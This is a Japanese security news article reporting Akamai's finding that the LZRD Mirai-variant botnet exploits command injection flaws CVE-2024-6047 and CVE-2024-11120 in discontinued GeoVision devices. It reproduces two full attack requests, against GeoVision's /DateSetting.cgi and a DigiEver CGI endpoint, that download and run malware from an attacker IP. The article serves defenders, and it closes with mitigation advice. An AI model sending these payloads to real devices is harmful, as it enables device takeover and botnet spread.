GeoVision の製造中止 IoT 機器の脆弱性 CVE-2024-6047/11120:ボットネット LZRD による悪用を観測

Botnet Exploits Old GeoVision IoT Devices via CVE-2024-6047 & CVE-2024-11120

2025/05/07 SecurityOnline — GeoVision の製造中止となった IoT デバイスに存在する、2つのコマンド・インジェクション脆弱性が積極的に悪用されていることを、Akamai の Security Intelligence and Response Team (SIRT) が特定した。Akamai は、「2024年6月/11月に公開された、脆弱性 CVE-2024-6047/CVE-2024-11120 が、積極的に悪用された初めての事例となる」と述べている。

脆弱性のある GeoVision デバイスの、”/DateSetting.cgi” エンドポイントを狙う攻撃者たちが、szSrvIpAddr パラメータを介して悪意のコマンドを注入しているという。この脆弱性の悪用に成功した未認証の攻撃者は、リモートからの任意のシステム・コマンド実行の可能性を手にする。

Akamai は、「製造中止となった一部の GeoVision デバイスでは、szSrvIpAddr パラメータに対するユーザー入力のフィルタリングが正しく行われていない。そのため、未認証のリモートの攻撃者に対して、任意のシステム・コマンドの注入/実行を許す可能性がある」と説明している。

この脆弱性が悪用されたデバイスでは、以下のような悪意の URL からの、マルウェアのダウンロードと実行が引き起こされる。今回の攻撃で用いられるのは、Mirai 亜種の LZRD である:

/DateSetting.cgi dwTimeZone=2&dwGainType=0&szSrvIpAddr=time.windows.com;$(cd /tmp;wget http://176.65.144[.]253/hiddenbin/boatnet.arm7;chmod 777 boatnet.arm7;./boatnet.arm7 geovision;)&NTP_Update_time_hh=5&NTP_Update_time_mm=10&szDateM=2024/08/07&szTimeM=14:25:16&bDateFomat=0&bDateFormatMisc=0&dwIsDelay=1&Montype=0&submit=Apply

このペイロードは ARM アーキテクチャ向けに作成されており、攻撃者が細工した HTTP POST リクエストを介して注入される。

実行されたマルウェアは、LZRD 亜種の特徴である固有のコンソール文字列を、被害者のマシンに出力する。Akamai は、 Mirai の系譜と一致する、一連の攻撃機能も確認している。それには、以下のものが含まれる:

  • sym.attack_method_tcp
  • sym.attack_udp_plain
  • sym.attack_method_ovh
  • sym.attack_method_stdhex

さらに確認されたものには、マルウェアの sym.resolve_cnc_addr () 関数内にハードコードされた、C2 (command-and-control) IP アドレスもある。このインフラには、過去のキャンペーンで確認された、InfectedSlurs ボットネットに類似するバナーが取り込まれていた。

この LZRD ボットネットは、GeoVision デバイス以外の脆弱性も狙っている。Akamai のハニーポットでは、以下のような既知の脆弱性に対する攻撃も観測された:

  • Hadoop YARN の脆弱性
  • ZTE ZXV10 H108L ルーターの脆弱性 CVE-2018-10561
  • Akamai が以前に報告した DigiEver 製 IoT 機器の脆弱性

あるペイロードでは、以下のような CGI スクリプトを取得/実行しようとしていた:

/cgi-bin/cgi_main.cgi
  cgiName=time_tzsetup.cgi&page=/cfg_system_time.htm&id=69&ntp=`curl --output wget.sh http://176.65.144[.]253/digi.sh; chmod 777 *; ./wget.sh`&ntp1=time.stdtime.gov.tw&ntp2=`curl --output wget.sh http://176.65.144[.]253/digi.sh; chmod 777 *; ./wget.sh`&isEnabled=0&timeDiff=+9&ntpAutoSync=1&ntpSyncMode=1&day=0&hour=0&min=0&syncDiff=30

Akamai は、侵害の兆候 (IOC:Indicators of Compromise) を含む詳細レポートを公開し、ユーザー組織に対して、以下の対応を推奨している:

  • 既知の悪意のエンドポイント (hiddenbin/boatnet.arm7 および関連ドメインなど) をブロックする。
  • 古い IoT デバイスの運用を終了する。あるいは、ネットワークから隔離する。
  • 既知の C2 IP への異常な接続を、ネットワーク・トラフィックで監視する。

GeoVision の脆弱性 CVE-2024-6047/CVE-2024-11120 ですが、2024年の時点で第一報が提供されていました。よろしければ、2024/06/17 の「GeoVision の RCE 脆弱性 CVE-2024-6047 (CVSS 9.8):EOL デバイス群に深刻なリスクの恐れ」と、2024/11/15 の「GeoVision の脆弱性 CVE-2024-11120 (CVSS 9.8):EoL デバイスを狙う積極的な悪用を観測」をご参照ください。ご利用のチームは、ご注意ください。